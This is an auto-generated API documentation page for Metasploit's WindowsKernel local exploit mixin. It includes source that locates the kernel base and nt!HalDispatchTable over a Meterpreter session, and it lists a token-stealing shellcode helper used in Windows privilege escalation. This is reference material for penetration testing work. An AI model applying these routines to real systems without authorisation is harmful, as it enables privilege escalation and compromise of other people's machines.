adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Local/WindowsKernel.html
T

1062 lines
616 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Local::WindowsKernel
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Local::WindowsKernel";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (W)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Local.html" title="Msf::Exploit::Local (class)">Local</a></span></span>
&raquo;
<span class="title">WindowsKernel</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Local::WindowsKernel
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../Post/Windows/Error.html" title="Msf::Post::Windows::Error (module)">Post::Windows::Error</a></span>, <span class='object_link'><a href="../../PostMixin.html" title="Msf::PostMixin (module)">PostMixin</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/local/windows_kernel.rb</dd>
</dl>
</div>
<h2>Constant Summary</h2>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="../../Post/Windows/Error.html" title="Msf::Post::Windows::Error (module)">Post::Windows::Error</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Post/Windows/Error.html#ABANDONED_WAIT_0-constant" title="Msf::Post::Windows::Error::ABANDONED_WAIT_0 (constant)">Post::Windows::Error::ABANDONED_WAIT_0</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABANDONED_WAIT_63-constant" title="Msf::Post::Windows::Error::ABANDONED_WAIT_63 (constant)">Post::Windows::Error::ABANDONED_WAIT_63</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABANDON_HIBERFILE-constant" title="Msf::Post::Windows::Error::ABANDON_HIBERFILE (constant)">Post::Windows::Error::ABANDON_HIBERFILE</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABIOS_ERROR-constant" title="Msf::Post::Windows::Error::ABIOS_ERROR (constant)">Post::Windows::Error::ABIOS_ERROR</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_AUDIT_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_AUDIT_BY_POLICY (constant)">Post::Windows::Error::ACCESS_AUDIT_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DENIED-constant" title="Msf::Post::Windows::Error::ACCESS_DENIED (constant)">Post::Windows::Error::ACCESS_DENIED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_BY_POLICY (constant)">Post::Windows::Error::ACCESS_DISABLED_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY (constant)">Post::Windows::Error::ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_WEBBLADE-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_WEBBLADE (constant)">Post::Windows::Error::ACCESS_DISABLED_WEBBLADE</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_WEBBLADE_TAMPER-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_WEBBLADE_TAMPER (constant)">Post::Windows::Error::ACCESS_DISABLED_WEBBLADE_TAMPER</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_DISABLED-constant" title="Msf::Post::Windows::Error::ACCOUNT_DISABLED (constant)">Post::Windows::Error::ACCOUNT_DISABLED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_EXPIRED-constant" title="Msf::Post::Windows::Error::ACCOUNT_EXPIRED (constant)">Post::Windows::Error::ACCOUNT_EXPIRED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_LOCKED_OUT-constant" title="Msf::Post::Windows::Error::ACCOUNT_LOCKED_OUT (constant)">Post::Windows::Error::ACCOUNT_LOCKED_OUT</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_RESTRICTION-constant" title="Msf::Post::Windows::Error::ACCOUNT_RESTRICTION (constant)">Post::Windows::Error::ACCOUNT_RESTRICTION</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACPI_ERROR-constant" title="Msf::Post::Windows::Error::ACPI_ERROR (constant)">Post::Windows::Error::ACPI_ERROR</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACTIVATION_COUNT_EXCEEDED-constant" title="Msf::Post::Windows::Error::ACTIVATION_COUNT_EXCEEDED (constant)">Post::Windows::Error::ACTIVATION_COUNT_EXCEEDED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACTIVE_CONNECTIONS-constant" title="Msf::Post::Windows::Error::ACTIVE_CONNECTIONS (constant)">Post::Windows::Error::ACTIVE_CONNECTIONS</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ADAP_HDW_ERR-constant" title="Msf::Post::Windows::Error::ADAP_HDW_ERR (constant)">Post::Windows::Error::ADAP_HDW_ERR</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ADDRESS_ALREADY_ASSOCIATED-constant" title="Msf::Post::Windows::Error::ADDRESS_ALREADY_ASSOCIATED (constant)">Post::Windows::
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../SessionCompatibility.html" title="Msf::SessionCompatibility (module)">SessionCompatibility</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../SessionCompatibility.html#passive-instance_method" title="Msf::SessionCompatibility#passive (method)">#passive</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_types-instance_method" title="Msf::SessionCompatibility#session_types (method)">#session_types</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../Module/HasActions.html" title="Msf::Module::HasActions (module)">Module::HasActions</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/HasActions.html#actions-instance_method" title="Msf::Module::HasActions#actions (method)">#actions</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#default_action-instance_method" title="Msf::Module::HasActions#default_action (method)">#default_action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive-instance_method" title="Msf::Module::HasActions#passive (method)">#passive</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive_actions-instance_method" title="Msf::Module::HasActions#passive_actions (method)">#passive_actions</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#find_haldispatchtable-instance_method" title="#find_haldispatchtable (instance method)">#<strong>find_haldispatchtable</strong> &#x21d2; Integer<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Find the address of nt!HalDispatchTable.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#find_sys_base-instance_method" title="#find_sys_base (instance method)">#<strong>find_sys_base</strong>(drvname) &#x21d2; Array<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Find the load address for a device driver on the session.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#open_device-instance_method" title="#open_device (instance method)">#<strong>open_device</strong>(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0) &#x21d2; Integer<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Open a device on a meterpreter session with a call to CreateFileA and return the handle.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#token_stealing_shellcode-instance_method" title="#token_stealing_shellcode (instance method)">#<strong>token_stealing_shellcode</strong>(target, backup_token = nil, arch = nil, append_ret = true) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate token stealing shellcode suitable for use when overwriting the HaliQuerySystemInformation pointer.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../SessionCompatibility.html" title="Msf::SessionCompatibility (module)">SessionCompatibility</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../SessionCompatibility.html#check_for_session_readiness-instance_method" title="Msf::SessionCompatibility#check_for_session_readiness (method)">#check_for_session_readiness</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#cleanup-instance_method" title="Msf::SessionCompatibility#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#command_names_for-instance_method" title="Msf::SessionCompatibility#command_names_for (method)">#command_names_for</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#compatible_sessions-instance_method" title="Msf::SessionCompatibility#compatible_sessions (method)">#compatible_sessions</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#meterpreter_session_incompatibility_reasons-instance_method" title="Msf::SessionCompatibility#meterpreter_session_incompatibility_reasons (method)">#meterpreter_session_incompatibility_reasons</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#passive%3F-instance_method" title="Msf::SessionCompatibility#passive? (method)">#passive?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#post_commands-instance_method" title="Msf::SessionCompatibility#post_commands (method)">#post_commands</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session-instance_method" title="Msf::SessionCompatibility#session (method)">#session</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_changed%3F-instance_method" title="Msf::SessionCompatibility#session_changed? (method)">#session_changed?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_compatible%3F-instance_method" title="Msf::SessionCompatibility#session_compatible? (method)">#session_compatible?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_display_info-instance_method" title="Msf::SessionCompatibility#session_display_info (method)">#session_display_info</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_incompatibility_reasons-instance_method" title="Msf::SessionCompatibility#session_incompatibility_reasons (method)">#session_incompatibility_reasons</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#setup-instance_method" title="Msf::SessionCompatibility#setup (method)">#setup</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#sysinfo-instance_method" title="Msf::SessionCompatibility#sysinfo (method)">#sysinfo</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Post/Common.html" title="Msf::Post::Common (module)">Post::Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Post/Common.html#clear_screen-instance_method" title="Msf::Post::Common#clear_screen (method)">#clear_screen</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec-instance_method" title="Msf::Post::Common#cmd_exec (method)">#cmd_exec</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec_get_pid-instance_method" title="Msf::Post::Common#cmd_exec_get_pid (method)">#cmd_exec_get_pid</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec_with_result-instance_method" title="Msf::Post::Common#cmd_exec_with_result (method)">#cmd_exec_with_result</a></span>, <span class='object_link'><a href="../../Post/Common.html#command_exists%3F-instance_method" title="Msf::Post::Common#command_exists? (method)">#command_exists?</a></span>, <span class='object_link'><a href="../../Post/Common.html#create_process-instance_method" title="Msf::Post::Common#create_process (method)">#create_process</a></span>, <span class='object_link'><a href="../../Post/Common.html#get_env-instance_method" title="Msf::Post::Common#get_env (method)">#get_env</a></span>, <span class='object_link'><a href="../../Post/Common.html#get_envs-instance_method" title="Msf::Post::Common#get_envs (method)">#get_envs</a></span>, <span class='object_link'><a href="../../Post/Common.html#peer-instance_method" title="Msf::Post::Common#peer (method)">#peer</a></span>, <span class='object_link'><a href="../../Post/Common.html#report_virtualization-instance_method" title="Msf::Post::Common#report_virtualization (method)">#report_virtualization</a></span>, <span class='object_link'><a href="../../Post/Common.html#rhost-instance_method" title="Msf::Post::Common#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../../Post/Common.html#rport-instance_method" title="Msf::Post::Common#rport (method)">#rport</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/HasActions.html" title="Msf::Module::HasActions (module)">Module::HasActions</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/HasActions.html#action-instance_method" title="Msf::Module::HasActions#action (method)">#action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#find_action-instance_method" title="Msf::Module::HasActions#find_action (method)">#find_action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive%3F-instance_method" title="Msf::Module::HasActions#passive? (method)">#passive?</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive_action%3F-instance_method" title="Msf::Module::HasActions#passive_action? (method)">#passive_action?</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_we
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="find_haldispatchtable-instance_method">
#<strong>find_haldispatchtable</strong> &#x21d2; <tt>Integer</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Find the address of nt!HalDispatchTable.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>The address of nt!HalDispatchTable.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If the address could not be found.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 31</span>
<span class='kw'>def</span> <span class='id identifier rubyid_find_haldispatchtable'>find_haldispatchtable</span>
<span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='comma'>,</span> <span class='id identifier rubyid_kernel_name'>kernel_name</span> <span class='op'>=</span> <span class='id identifier rubyid_find_sys_base'>find_sys_base</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to find the address of the Windows kernel</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Kernel Base Address: 0x</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h_kernel'>h_kernel</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>LoadLibraryExA</span><span class='lparen'>(</span><span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to load </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_h_kernel'>h_kernel</span> <span class='op'>=</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>GetProcAddress</span><span class='lparen'>(</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HalDispatchTable</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to retrieve the address of nt!HalDispatchTable (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>=</span> <span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>-=</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>+=</span> <span class='id identifier rubyid_kernel_address'>kernel_address</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>HalDispatchTable Address: 0x</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="find_sys_base-instance_method">
#<strong>find_sys_base</strong>(drvname) &#x21d2; <tt>Array</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Find the load address for a device driver on the session.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>drvname</span>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The name of the module to find, otherwise the kernel if this value is nil.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array containing the base address and the located drivers name.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If the name specified could not be found.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_find_sys_base'>find_sys_base</span><span class='lparen'>(</span><span class='id identifier rubyid_drvname'>drvname</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span> <span class='op'>==</span> <span class='int'>8</span>
<span class='id identifier rubyid_ptr'>ptr</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Q&lt;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>else</span>
<span class='id identifier rubyid_ptr'>ptr</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>V</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>EnumDeviceDrivers</span><span class='lparen'>(</span><span class='int'>0</span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span><span class='rparen'>)</span>
